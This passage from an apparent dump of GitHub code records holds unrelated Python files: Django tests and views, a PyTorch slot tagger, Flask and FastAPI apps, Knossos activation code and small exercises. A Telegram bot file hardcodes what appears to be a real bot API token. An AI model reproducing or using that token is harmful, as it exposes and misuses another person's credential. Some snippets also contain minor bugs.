form tests.\"\"\"\n\nfrom collections import OrderedDict\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nimport pytest\nfrom django.db import 
models\n\nfrom model_filters.constants import OR_SEPARATOR\nfrom model_filters.forms.field_filter import FieldFilterForm\n\n\n@pytest.mark.unit\nclass Tests(TestCase):\n \"\"\"Field filter form tests.\"\"\"\n\n def test_init(self):\n \"\"\"Field filter form should be initialized properly with no args.\"\"\"\n form = FieldFilterForm()\n self.assertIsNone(form.model)\n self.assertEqual({}, form.field_operators)\n self.assertEqual({}, form.field_values)\n self.assertEqual(\n FieldFilterForm.EXTRA_FIELD_CHOICES, form.fields[\"field\"].choices\n )\n\n def test_init_args(self):\n \"\"\"Field filter form should be initialized properly with args.\"\"\"\n model = Mock()\n field_choices = OrderedDict({\"test\": \"Test\"})\n field_operators = {\"field\": [{\"exact\": \"Exact\"}]}\n field_values = {\"field\": [{\"name\": \"value\"}]}\n form = FieldFilterForm(\n model=model,\n field_choices=field_choices,\n field_operators=field_operators,\n field_values=field_values,\n )\n self.assertEqual(model, form.model)\n self.assertEqual(\n list(field_choices.items()) + FieldFilterForm.EXTRA_FIELD_CHOICES,\n form.fields[\"field\"].choices,\n )\n self.assertEqual(field_operators, form.field_operators)\n self.assertEqual(field_values, form.field_values)\n\n @patch(\"model_filters.forms.field_filter.FieldFilterForm._clean_value\")\n @patch(\"model_filters.forms.field_filter.FieldFilterForm._clean_operator\")\n def test_clean(self, mock_operator, mock_value):\n \"\"\"Field filter values should be valid.\"\"\"\n mock_operator.return_value = \"cleaned operator\"\n mock_value.return_value = \"cleaned value\"\n form = FieldFilterForm()\n form.cleaned_data = {}\n form._errors = {}\n cleaned_data = form.clean()\n self.assertTrue(mock_operator.called)\n self.assertEqual(cleaned_data[\"operator\"], \"cleaned operator\")\n self.assertTrue(mock_value.called)\n self.assertEqual(cleaned_data[\"value\"], \"cleaned value\")\n\n @patch(\"model_filters.forms.field_filter.get_fields_from_path\")\n def test_clean_value(self, mock_get_field):\n \"\"\"Field filter should have valid value field.\"\"\"\n mock_get_field.return_value = [Mock(to_python=Mock())]\n form = FieldFilterForm()\n self.assertIsNone(form._clean_value({}))\n self.assertIsNone(form._clean_value({\"field\": \"\"}))\n self.assertIsNone(form._clean_value({\"field\": \"name\"}))\n self.assertIsNone(form._clean_value({\"field\": \"name\", \"operator\": \"\"}))\n self.assertIsNone(form._clean_value({\"field\": \"name\", \"operator\": \"exact\"}))\n self.assertEqual(\n \"Road Runner\",\n form._clean_value(\n {\"field\": \"name\", \"operator\": \"exact\", \"value\": \"Road Runner\"}\n ),\n )\n\n def test_clean_value_no_value(self):\n \"\"\"Field filter should have valid value field for OR separator.\"\"\"\n form = FieldFilterForm()\n form._errors = {\"value\": \"no bueno\"}\n self.assertEqual(\n \"\",\n form._clean_value(\n {\"field\": \"explosive\", \"operator\": OR_SEPARATOR, \"value\": \"junk\"}\n ),\n )\n self.assertFalse(form.fields[\"value\"].required)\n self.assertEqual({}, form._errors)\n\n form = FieldFilterForm()\n form._errors = {\"value\": \"no bueno\"}\n self.assertEqual(\n \"\",\n form._clean_value(\n {\"field\": OR_SEPARATOR, \"operator\": \"exact\", \"value\": \"junk\"}\n ),\n )\n self.assertFalse(form.fields[\"value\"].required)\n self.assertEqual({}, form._errors)\n\n form = FieldFilterForm()\n form._errors = {\"value\": \"no bueno\"}\n self.assertEqual(\n \"\", form._clean_value({\"field\": \"explosive\", \"operator\": \"istrue\"})\n )\n 
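The mocked `get_fields_from_path` above stands in for the real lookup whose result exposes `to_python()`; with an actual Django field, the coercion these tests exercise looks like this (a sketch using plain Django, independent of this test module):

```python
# Plain-Django sketch of the coercion _clean_value delegates to.
from django.core.exceptions import ValidationError
from django.db import models

field = models.IntegerField()
assert field.to_python("42") == 42       # coerces clean input
try:
    field.to_python("Road Runner")       # rejects bad input
except ValidationError as exc:
    # the exact quoting of the message varies across Django versions,
    # which is why the tests above accept both spellings
    print(exc.messages)
```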
self.assertEqual({}, form._errors)\n\n @patch(\"model_filters.forms.field_filter.get_fields_from_path\")\n def test_clean_value_bad_int_value(self, mock_get_field):\n \"\"\"Field filter should validate bad value types.\"\"\"\n mock_get_field.return_value = [models.IntegerField()]\n form = FieldFilterForm()\n form.cleaned_data = {}\n self.assertEqual(\n \"Road Runner\",\n form._clean_value(\n {\"field\": \"age\", \"operator\": \"exact\", \"value\": \"Road Runner\"}\n ),\n )\n try:\n self.assertEqual(\n form.errors[\"value\"],\n [\n \"Value is not valid for field (IntegerField): \"\n \"“Road Runner” value must be an integer.\"\n ],\n )\n except AssertionError:\n self.assertEqual(\n form.errors[\"value\"],\n [\n \"Value is not valid for field (IntegerField): \"\n \"'Road Runner' value must be an integer.\"\n ],\n )\n\n @patch(\"model_filters.forms.field_filter.get_fields_from_path\")\n def test_clean_value_exception(self, mock_get_field):\n \"\"\"Field filter should handle exceptions from bad value types.\"\"\"\n mock_get_field.return_value = [\n Mock(\n to_python=Mock(side_effect=ValueError(\"Bad value!\")),\n get_internal_type=Mock(return_value=\"MockField\"),\n )\n ]\n\n form = FieldFilterForm()\n form.cleaned_data = {}\n self.assertEqual(\n \"Road Runner\",\n form._clean_value(\n {\"field\": \"age\", \"operator\": \"exact\", \"value\": \"Road Runner\"}\n ),\n )\n self.assertEqual(\n form.errors[\"value\"],\n [\"Value is not valid for field (MockField): Bad value!\"],\n )\n\n def test_clean_operator(self):\n \"\"\"Field filter should validate operators.\"\"\"\n form = FieldFilterForm()\n form.cleaned_data = {}\n self.assertIsNone(form._clean_operator({}))\n self.assertIsNone(form._clean_operator({\"field\": \"\"}))\n self.assertIsNone(form._clean_operator({\"field\": \"name\"}))\n self.assertIsNone(form._clean_operator({\"field\": \"name\", \"operator\": \"\"}))\n self.assertEqual(\n \"exact\", form._clean_operator({\"field\": \"name\", \"operator\": \"exact\"})\n )\n self.assertEqual(\n form.errors[\"operator\"], [\"Operator 'exact' is not allowed for this field.\"]\n )\n\n # Valid setup.\n form = FieldFilterForm(\n field_operators={\"name\": [{\"key\": \"exact\", \"value\": \"Exact\"}]}\n )\n self.assertEqual(\n \"exact\", form._clean_operator({\"field\": \"name\", \"operator\": \"exact\"})\n )\n self.assertFalse(\"operator\" in form.errors)\n\n def test_clean_operator_with_or(self):\n \"\"\"Field filter should validate operators.\"\"\"\n form = FieldFilterForm(\n field_operators={\"name\": [{\"key\": \"exact\", \"value\": \"Exact\"}]}\n )\n self.assertEqual(\n \"exact\", form._clean_operator({\"field\": OR_SEPARATOR, \"operator\": \"exact\"})\n )\n self.assertFalse(\"operator\" in form.errors)\n","repo_name":"barqshasbite/django-admin-model-filters","sub_path":"model_filters/forms/field_filter_tests.py","file_name":"field_filter_tests.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14314192975","text":"\nfrom django import forms\nfrom django.shortcuts import render,redirect\nfrom .models import Product\nfrom .forms import ProducModelForm\n\ndef addOrder_view(request):\n form=ProducModelForm()\n if request.method=='POST':\n form=ProducModelForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('show')\n template_name='AddOrder.html'\n context={'form':form}\n return render(request,template_name,context)\n\ndef showOrder_view(request):\n obj=Product.objects.all()\n 
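The views in this record fetch objects with `Product.objects.get(id=pk)` (see `update_view` and `delete_view` below), which raises an unhandled `DoesNotExist` on a bad primary key. A common hardening, sketched here with the standard Django shortcut rather than the author's code:

```python
# Sketch: return a 404 instead of crashing on a missing Product.
from django.shortcuts import get_object_or_404, redirect

def delete_view(request, pk):
    obj = get_object_or_404(Product, id=pk)  # Product as imported in this record
    obj.delete()
    return redirect('show')
```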
print(obj)\n template_name='ShowOrder.html'\n context={'obj':obj}\n return render(request,template_name,context)\n\ndef update_view(request,pk):\n obj=Product.objects.get(id=pk)\n form=ProducModelForm(instance=obj)\n if request.method=='POST':\n form=ProducModelForm(request.POST,instance=obj)\n if form.is_valid():\n form.save()\n return redirect('show')\n template_name='AddOrder.html'\n context={'form':form}\n return render(request,template_name,context)\n\ndef delete_view(request,pk):\n obj=Product.objects.get(id=pk)\n obj.delete()\n return redirect('show')\n\ndef home_view(request):\n template_name='Home.html'\n context={}\n return render(request,template_name,context)\n\n\n \n\n\n\n \n","repo_name":"Capthak/InventoryManagement","sub_path":"Project73/Project73/InventoryManagement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73079986987","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nfrom sklearn.model_selection import train_test_split,cross_val_score\nfrom sklearn.metrics import f1_score,accuracy_score,confusion_matrix,make_scorer\nseed=1\nnp.random.seed(seed)\ntorch.manual_seed(seed)\nrandom.seed(seed)\n\ntrain_df=pd.read_csv('./train_data.csv')\ntrain_df.head()\ntest_df=pd.read_csv('./test_data.csv')\ntest_df.head()\n\ntest_tags=[(' ').join(['O']*len(i.split())) for i in test_df['utterances'].values]\nprint (len(test_tags))\ntest_df['IOB Slot tags']=test_tags\ntest_df.head()\n\nall_df=pd.concat([train_df,test_df],ignore_index=True)\nall_df.head()\n\nfrom collections import defaultdict\nwordscount=defaultdict(list)\nfor i in train_df.values.tolist():\n s,t=i[0].split(),i[1].split()\n for j in range(len(s)):\n wordscount[s[j]].append(t[j])\n \nwordscount_={}\nfor k,v in wordscount.items():\n x=Counter(v).most_common()[0]\n # print (k,x)\n if(len(v)>1):\n wordscount_[k]=x[0]\n else:\n wordscount_[k]=''\n\nfrom tqdm import tqdm\ns_id,prevprev_word,prev_word,word,next_word,nextnext_word,prevprev_tag,prev_tag,tag,count=[],[],[],[],[],[],[],[],[],[]\nfor idx,row in tqdm(all_df.iterrows()):\n u_words,u_tags= row['utterances'].split(),row['IOB Slot tags'].split()\n assert len(u_words)==len(u_tags)\n for i in range(len(u_words)):\n s_id.append(idx)\n if i==0:\n prevprev_word.append('')\n prev_word.append('')\n # prevprev_tag.append('')\n # prev_tag.append('')\n elif i==1:\n prevprev_word.append('')\n prev_word.append(u_words[0])\n # prevprev_tag.append('')\n # prev_tag.append(u_tags[0])\n else:\n prevprev_word.append(u_words[i-2])\n prev_word.append(u_words[i-1])\n # prevprev_tag.append(u_tags[i-2])\n # prev_tag.append(u_tags[i-1])\n \n word.append(u_words[i])\n tag.append(u_tags[i])\n try:count.append(wordscount_[u_words[i]])\n except:count.append('')\n try:next_word.append(u_words[i+1])\n except:next_word.append('')\n try:nextnext_word.append(u_words[i+2])\n except:nextnext_word.append('')\n \n \n \nword_df=pd.DataFrame(zip(s_id,prevprev_word,prev_word,word,next_word,nextnext_word,count,tag),columns=['s_id','prevprev_word','prev_word','word','next_word','nextnext_word','count','tag'])\ny=word_df['tag'].values\nnum_train_words=sum(word_df['s_id']']+list(vocab)\nword2idx={vocab[i]:i for i in 
range(len(vocab))}\nidx2word={i:vocab[i] for i in range(len(vocab))}\nassert len(word2idx)==len(idx2word)\n\ntags=y.tolist()\ntags=set(tags)\nprint ('tags length:',len(tags))\n\ntags=list(tags)\ntag2idx={tags[i]:i for i in range(len(tags))}\nidx2tag={i:tags[i] for i in range(len(tags))}\nassert len(tag2idx)==len(idx2tag)\n\ndef vectorize_vocab(word2idx,*argv):\n groups=[]\n for sents in argv[0]:\n groups.append([[word2idx[j] for j in i] for i in sents])\n return groups\n\nx_train,x_val,x_test=vectorize_vocab(word2idx,[x_train,x_val,x_test])\nmax_len=max([len(i) for i in x_train])\n\ndef vectorize_tag(tag2idx,*argv):\n groups=[]\n for sents in argv[0]:\n groups.append([tag2idx[j] for j in sents])\n return groups\ny_train,y_val=vectorize_tag(tag2idx,[y_train,y_val])\n# assert max_len==max([len(i) for i in y_train])\n\nfrom torch.utils.data import Dataset, DataLoader\n\nclass MovieData(Dataset):\n def __init__(self, X, y):\n try:\n self.X = torch.tensor(X)\n except ValueError as e:\n self.X = [torch.tensor(i) for i in X]\n self.y = [torch.tensor(i) for i in y]\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self,index):\n return self.X[index], self.y[index]\n\n\ntrain_dataset = MovieData(X=x_train,y=y_train)\nval_dataset = MovieData(X=x_val,y=y_val)\n\nbs=32\n\ntrain_dataloader = DataLoader(dataset=train_dataset,batch_size=bs,shuffle=True)\nval_dataloader = DataLoader(dataset=val_dataset,batch_size=bs,shuffle=True)\n\n\nclass LSTM_1(nn.Module):\n def __init__(self,vocab_size,embed_dim,num_class,hidden_size,padding_index=0):\n super(LSTM_1,self).__init__()\n self.emb = nn.Embedding(vocab_size, embed_dim, padding_idx=padding_index)\n self.rnn=nn.LSTM(input_size=embed_dim,hidden_size=hidden_size,num_layers=1,batch_first=True)\n self.fc1= nn.Linear(hidden_size,num_class)\n \n def forward(self,x):\n x=self.emb(x)\n out,h_n=self.rnn(x)\n h1=self.fc1(out[:,-1,:])\n return h1\n\nembed_size=200\nhidden_size=64\nclf = LSTM_1(vocab_size=len(vocab),embed_dim=embed_size,num_class=len(tags),hidden_size=hidden_size)\nloss_func = nn.NLLLoss()\nloss_func = nn.CrossEntropyLoss()\n\nclf = LSTM_1(vocab_size=len(vocab),embed_dim=embed_size,num_class=len(tags),hidden_size=hidden_size)\nlearning_rate=0.001\nnum_epochs=6\noptimizer = optim.Adam(clf.parameters(), lr=learning_rate)\nlosses = []\ntrain_losses,train_acc = [],[]\nval_losses, val_acc=[],[]\nmin_loss=1000\ntotal_step=len(train_dataloader)\n\nfor epoch in range(num_epochs):\n train_loss,correct=0,0\n total_tags=0\n total_val_tags=0\n for i,(X,y) in enumerate(train_dataloader):\n optimizer.zero_grad()\n # print (X.shape,y.shape)\n y_pred = clf(X)\n # print (y_pred.shape,y.shape)\n # break\n # break\n# break\n y=y.view(-1)\n loss = loss_func(y_pred, y)\n train_loss+=loss.item()\n\n y_pred=torch.argmax(y_pred,dim=1)\n y_pred,y=y_pred.flatten(),y.flatten()\n correct+= (y_pred==y).sum().item()\n total_tags+=y.shape[0]\n \n loss.backward()\n optimizer.step()\n if (i+1) % 50 == 0:\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n # break\n train_loss=round(train_loss/len(val_dataloader),3)\n acc=round(100*correct/total_tags,3)\n train_losses.append(train_loss)\n train_acc.append(acc)\n print (f\"Train loss: {train_loss} Train accuracy: {acc}\") \n\n val_loss,correct=0,0\n for i,(X,y) in enumerate(val_dataloader):\n y_pred = clf(X)\n y=y.view(-1)\n loss = loss_func(y_pred, y)\n val_loss+= round(loss.item(),3)\n\n y_pred=torch.argmax(y_pred,dim=1)\n # print (y_pred.shape)\n 
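Both loops in this record score token-level accuracy by argmax-ing the logits, flattening predictions and gold tags, and counting exact matches. The bookkeeping in isolation, with tensor values invented for illustration:

```python
# Standalone sketch of the accuracy bookkeeping used in these loops.
import torch

y_pred = torch.tensor([1, 3, 2, 2])  # argmax'd tag ids for one batch
y_gold = torch.tensor([1, 3, 0, 2])
correct = (y_pred == y_gold).sum().item()   # 3 matches
acc = 100 * correct / y_gold.shape[0]       # 75.0
```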
y_pred,y=y_pred.flatten(),y.flatten()\n # print (y[0:5],y_pred[0:5])\n # print ((y_pred==y).sum().item(),len(y),total_val_tags)\n correct+= (y_pred==y).sum().item()\n total_val_tags+=len(y)\n \n val_loss=round(val_loss/len(val_dataloader),3)\n\n if(val_loss\")\ndef get_user(id):\n\n if \"uuid\" not in session:\n redirect(\"/\")\n\n import json\n import os \n\n words_loc = os.getcwd() + \"/flask_app/static/words/animals.json\"\n\n # Opening JSON file\n with open(words_loc) as json_file:\n data = json.load(json_file)\n\n animal_list = []\n for x in range(3):\n if data[random.randint(0, len(data) - 1)] not in animal_list:\n animal_list.append(data[random.randint(0, len(data) - 1)].upper())\n \n\n context = {\n\n \"words\" : animal_list,\n 'user' : model_user.User.get_user_by_id( { \"id\": id } ),\n 'curUser': model_user.User.get_user_by_id( { \"id\": session['uuid'] } ),\n\n }\n\n\n\n\n return render_template(\"game.html\", **context)\n\n\n@app.route(\"/send/drawing\", methods=[\"POST\"])\ndef send_drawing():\n model_drawing.Drawing.save(request.form)\n return jsonify(message=\"SUCCESS\")\n\n\n@app.route(\"/get/answer\", methods=['POST'])\ndef get_drawing():\n drawing = model_drawing.Drawing.get_drawing_by_id(request.form)\n return jsonify(answer = drawing['word'])\n\n\n@app.route(\"/game/guess/\")\ndef guess_drawing(id):\n\n if \"uuid\" not in session:\n return redirect(\"/register\")\n\n drawing = model_drawing.Drawing.get_drawing_by_id({'id': id})\n\n if(drawing['receiver_id'] != session['uuid']):\n return redirect(\"/dashboard\")\n drawing['image'] = str(drawing['image'], encoding='utf-8')\n\n context = {\n \"drawing\": drawing,\n \"curUser\" : model_user.User.get_user_by_id({\"id\" : session['uuid']})\n }\n\n\n return render_template('guessing.html', **context )\n\n\n@app.route(\"/delete/drawing/\")\ndef delete_drawing(id):\n\n if \"uuid\" not in session:\n return redirect(\"/register\")\n \n drawing = model_drawing.Drawing.get_drawing_by_id({'id': id})\n\n if (session['uuid'] != drawing['receiver_id']):\n return redirect(\"/dashboard\")\n \n \n model_drawing.Drawing.delete({\"id\": id})\n return redirect(\"/dashboard\")\n\n","repo_name":"PPadilla44/draw_something","sub_path":"flask_app/controllers/controller_drawing.py","file_name":"controller_drawing.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2870166257","text":"# Perform basic string compression using counts of repeated characters\n# aabcccccaaa => a2b1c5a3\n# if compressed string isn't smaller, return original string\n# assume upper case and lower case letters\n\n# O(n) time, O(1) space\ndef compress(word):\n if len(word) < 2:\n return word\n result = ''\n idx = 0\n prev_char = word[0]\n count = 1\n while idx < len(word):\n next_char = word[idx]\n if prev_char != next_char and prev_char != '':\n result = result + prev_char\n result = result + str(count)\n prev_char = next_char\n count = 1\n else:\n count += 1\n idx += 1\n result = result + prev_char\n result = result + str(count)\n\n # return result\n if len(result) < len(word):\n return result\n else:\n return word\n\nresult = compress(\"aabcccccaaa\")\nprint(result)\n\nresult = compress(\"ab\")\nprint(result)\n\nresult = compress(\"\")\nprint(result)\n\nresult = 
compress(\"aaaabbbbb\")\nprint(result)","repo_name":"Sebbenbear/ctci","sub_path":"data-structures/Q1_6_StringCompression.py","file_name":"Q1_6_StringCompression.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28836553496","text":"import requests\nimport telebot\n\n\nbot = telebot.TeleBot(\"5923964405:AAE7gh9q7BH5NWcuUFyeh-wVP97H4mABSWM\")\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n\tbot.reply_to(message, \"Привет, как у тебя дела?\")\n\n@bot.message_handler(content_types=['text'])\ndef echo_all(message):\n if message.text == 'Погода':\n data = requests.get('https://wttr.in/?format=3')\n bot.reply_to(message, data.text)\n\nbot.infinity_polling()","repo_name":"SergeiKogutov/Python","sub_path":"lesen on Python/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42074982150","text":"import torch\nimport ksc.torch_frontend as knossos\n\nimport ksc.compile\nfrom ksc.torch_frontend import cpp_string_to_autograd_function\n\nembedded_cflags = ksc.compile.default_cflags\n\n\nembedded_cflags_opts = ksc.compile.CFlags.GCCOnly(\n [\"-march=native\", \"-funroll-loops\", \"-ffast-math\", \"-mprefer-vector-width=512\",]\n)\n\n\ncpp_inlined_map = \"\"\"\n #include \"knossos.h\"\n\n namespace ks{\n ks::Float sqrl(ks::allocator * $alloc, tensor<2, ks::Float> t) {\n auto tdata = t.data();\n ks::Float sum = 0.0;\n auto ne = t.num_elements();\n\n for (int i = 0; i != ne; ++i) {\n sum += tdata[i];\n }\n\n ks::Float outsum = 0.0;\n\n if (sum < 0.0) {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = -0.125 * tdata[i];\n outsum += sin(r) * r;\n }\n } else {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = 0.5 * tdata[i] * tdata[i];\n outsum += sin(r) * r;\n }\n }\n\n return outsum / ne;\n }\n\n tensor<2, ks::Float> sufrev_sqrl(ks::allocator * $alloc, tensor<2, ks::Float> t, ks::Float dret) {\n auto tdata = t.data();\n ks::Float sum = 0.0;\n auto ne = t.num_elements();\n\n auto ret = tensor<2, ks::Float>::create($alloc, t.size());\n auto retdata = ret.data();\n\n for (int i = 0; i != ne; ++i) {\n sum += tdata[i];\n }\n\n auto dscale = dret / ne;\n\n if (sum < 0.0) {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = -0.125 * tdata[i];\n ks::Float dr = (sin(r) + cos(r) * r) * dscale;\n retdata[i] = -0.125 * dr;\n }\n } else {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = 0.5 * tdata[i] * tdata[i];\n ks::Float dr = (sin(r) + cos(r) * r) * dscale;\n retdata[i] = tdata[i] * dr;\n }\n }\n\n return ret;\n }\n }\n \"\"\"\n\n\nembedded_cpp_entry_points = \"\"\"\n#include \"knossos-entry-points-torch.h\"\n\nks::Float entry(torch::Tensor t) {\n using namespace ks::entry_points;\n auto ks_t = convert_to_ks_viewing_tensordata>(t);\n auto ks_ret = ks::sqrl(&g_alloc, ks_t);\n return ks_ret;\n}\n\ntorch::Tensor entry_vjp(torch::Tensor t, ks::Float dret) {\n using namespace ks::entry_points;\n auto ks_t = convert_to_ks_viewing_tensordata>(t);\n auto ks_dret = dret;\n auto ks_ret = ks::sufrev_sqrl(&g_alloc, ks_t, ks_dret);\n return convert_from_ks(ks_ret);\n}\n\"\"\"\n\n\ndef sqrl_embedded_cpp_inlined_map():\n return cpp_string_to_autograd_function(\n cpp_inlined_map + embedded_cpp_entry_points,\n \"ksc_dl_activations__manual__sqrl_embedded_cpp_inlined_map\",\n extra_cflags=embedded_cflags,\n )\n\n\ndef sqrl_embedded_cpp_inlined_map_flags():\n return 
cpp_string_to_autograd_function(\n cpp_inlined_map + embedded_cpp_entry_points,\n \"ksc_dl_activations__manual__sqrl_embedded_cpp_inlined_map_flags\",\n extra_cflags=embedded_cflags + embedded_cflags_opts,\n )\n\n\n# run-bench: Knossos source, and \"nice\" PyTorch implementation\n# DOC-KS\n@knossos.register\ndef sqrl(x: torch.Tensor):\n \"\"\"\n sqrl: Squared Leaky Relu\n Like a capsule from /Stuck in a Rut/\n Typically x is a 4x4 tensor, possibly\n packed in a 4n x 4m array\n \"\"\"\n y = torch.sum(x)\n if y < 0.0:\n t = -0.125 * x\n else:\n t = 1 / 2 * x ** 2\n return torch.mean(torch.sin(t) * t)\n\n\n# ENDDOC-KS\n\n# run-bench: PyTorch \"fast\" implementation\ndef sqrl_pytorch(x: torch.Tensor):\n return sqrl.raw_f(x)\n\n\n# run-bench: PyTorch \"nice\" implementation\ndef sqrl_pytorch_nice(x: torch.Tensor):\n return sqrl.raw_f(x)\n\n\n# run-bench: Define a range of values at which to call the methods\ndef sqrl_bench_configs():\n yield torch.randn((4, 4))\n yield torch.randn((16, 16))\n\n\n#################################\n#\n# vsqrl - vectorized sqrl\n#\n\nvsqrl = knossos.register_direct(sqrl, vmap=True, generate_lm=True) # TODO: Carbuncle\n\n\ndef sqrl_pytorch_where(x):\n \"\"\"\n Replace \"if\" with \"where\" to get torch.vmap to work\n \"\"\"\n y = torch.sum(x)\n t = torch.where(y < 0, -0.125 * x, 1 / 2 * x ** 2)\n tsint = torch.sin(t) * t\n return torch.mean(tsint)\n\n\nimport torch._vmap_internals\n\nvsqrl_pytorch_nice = torch._vmap_internals.vmap(sqrl_pytorch_where)\n\n\ndef vsqrl_pytorch(x):\n \"\"\"\n Hand-vectorized pytorch implementation, assuming x is rank 3\n \"\"\"\n y = torch.sum(x, (1, 2), keepdim=True)\n y_lt_0 = (y < 0).repeat((1, *x.size()[1:]))\n t = torch.where(y_lt_0, -0.125 * x, 1 / 2 * x ** 2)\n tsint = torch.sin(t) * t\n return torch.mean(tsint, (1, 2))\n\n\n# run-bench: Define a range of values at which to call the methods\ndef vsqrl_bench_configs():\n yield torch.randn((10, 4, 4))\n yield torch.randn((1000, 4, 4))\n yield torch.randn((1000, 16, 16))\n","repo_name":"microsoft/knossos-ksc","sub_path":"examples/dl-capsule/sqrl.py","file_name":"sqrl.py","file_ext":"py","file_size_in_byte":5149,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"9121201865","text":"\"\"\"\nparameter flag\n 0->The function will return the whole list of streets\n 1->The function will return the list of streets that have to travel by to reach a goal\n\"\"\"\ndef search(lines, start, finish, flag=0):\n dict = {}\n\n for line, routes in lines.items():\n for route in routes:\n if start in route and finish in route:\n if route.index(start) < route.index(finish):\n #print(f\"{line} : {route}\\n\")\n if flag == 0:\n dict[line] = route\n elif flag == 1:\n dict[line] = route[route.index(start):route.index(finish)+1]\n else:\n return dict\n\n return dict","repo_name":"mikitomi21/Public_transport_timetable","sub_path":"Search_line.py","file_name":"Search_line.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"645920999","text":"from django.urls import path\nfrom post.views import postView, postEditView\n\nurlpatterns = [\n path('', postView.home, name=\"home\"),\n path('', postView.detail, name=\"detail\"),\n path('new/', postView.new, name=\"new\"),\n path('create/', postView.create, name=\"create\"),\n path('/delete', postView.delete, name=\"delete\"),\n path('edit/', postEditView.post_edit, name=\"edit\"),\n path('/update', 
postEditView.post_update, name=\"update\"),\n #모집요강\n path('edit/', postEditView.detailpage_update, name=\"detailupdate\"), \n]","repo_name":"SYULION9TH/2021-syu-club","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73904739252","text":"from fastapi import FastAPI\nimport uvicorn\nfrom pdf2docx import Converter\nfrom docx2pdf import convert\nimport pytesseract\nfrom PIL import Image\n\npytesseract.pytesseract.tesseract_cmd = r'D:\\Software\\Tesseract-OCR\\tesseract.exe'\n\napp = FastAPI(title=\"VAF-MIND2\")\n\n\n# pdf转docx\n@app.get(\"/pdf2docx\", summary='pdf转docx', tags=['pdf转docx'])\ndef pdf2docx(path: str = None):\n end = \"false\"\n # 调库进行转换\n cv = Converter(path)\n cv.convert(path[:-4] + \".docx\")\n cv.close()\n end = \"true\"\n return end\n\n\n# docx转pdf\n@app.get(\"/docx2pdf\", summary='docx转pdf', tags=['docx转pdf'])\ndef docx2pdf(path: str = None):\n end = \"false\"\n # 调库进行转换\n convert(path, path[:-5] + \".pdf\")\n end = \"true\"\n return end\n\n\n# 图片转文字\n@app.get(\"/img2text\", summary='图片转文字', tags=['图片转文字'])\ndef img2text(path: str = None):\n # print(path)\n # 调库进行转换\n image = Image.open(path)\n text = pytesseract.image_to_string(image, lang='chi_sim')\n # print(text)\n file_handle = open(path.split(\".\")[0] + \".txt\", mode='w', encoding='utf-8')\n file_handle.write(text)\n file_handle.close()\n return text\n\n\nif __name__ == '__main__':\n uvicorn.run(\"main:app\", host='0.0.0.0', port=9093)\n","repo_name":"tyza66/VA-File","sub_path":"backend/python/VAF-MIND2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42477949100","text":"# !/usr/bin/env python3\n# -*- codingg:utf-8 -*-\n# author:zlbd\n\n\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import *\nfrom bl import Lottery\n\n\nclass Panel:\n def __init__(self, data):\n self.data = data\n self.showEnable = True \n #self.showEnable = False \n\n def x(self, n):\n ks = []\n for k in range(0, n):\n ks.append(k)\n return np.array(ks)\n\n def y(self, lyst):\n return np.array(lyst)\n\n def show(self):\n if self.showEnable:\n bar(self.x(13), self.y(self.data.blues))\n bar(self.x(36), self.y(self.data.reds))\n show()\n\n\ndef main():\n lottery = Lottery('web.shtml')\n lottery.fixture()\n lottery.generate()\n panel = Panel(lottery)\n panel.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"zlbd/biglottery","sub_path":"src/blpanel.py","file_name":"blpanel.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2697457077","text":"import sys\nimport random\nimport csv\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QDialog\nfrom PyQt5.QtWidgets import QInputDialog, QFileDialog, QTableWidgetItem\nfrom addalphabetdialogue import Ui_Dialog as AddAlphabetDialogue\nfrom rotor_change import Ui_Dialog as RotorChangeDialogue\nfrom reflector_change import Ui_Dialog as ReflectorChangeDialogue\nfrom change_plug import Ui_Dialog as PlugChangeDialogue\nfrom Help import Ui_Dialog as HelpDialogue\nfrom main_window import Ui_MainWindow\n\n# Алфавит по умолчанию\n\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n\n# Класс диалогового окна выбора алфавита\n\nclass DialogWindowAddAlphabet(QDialog, 
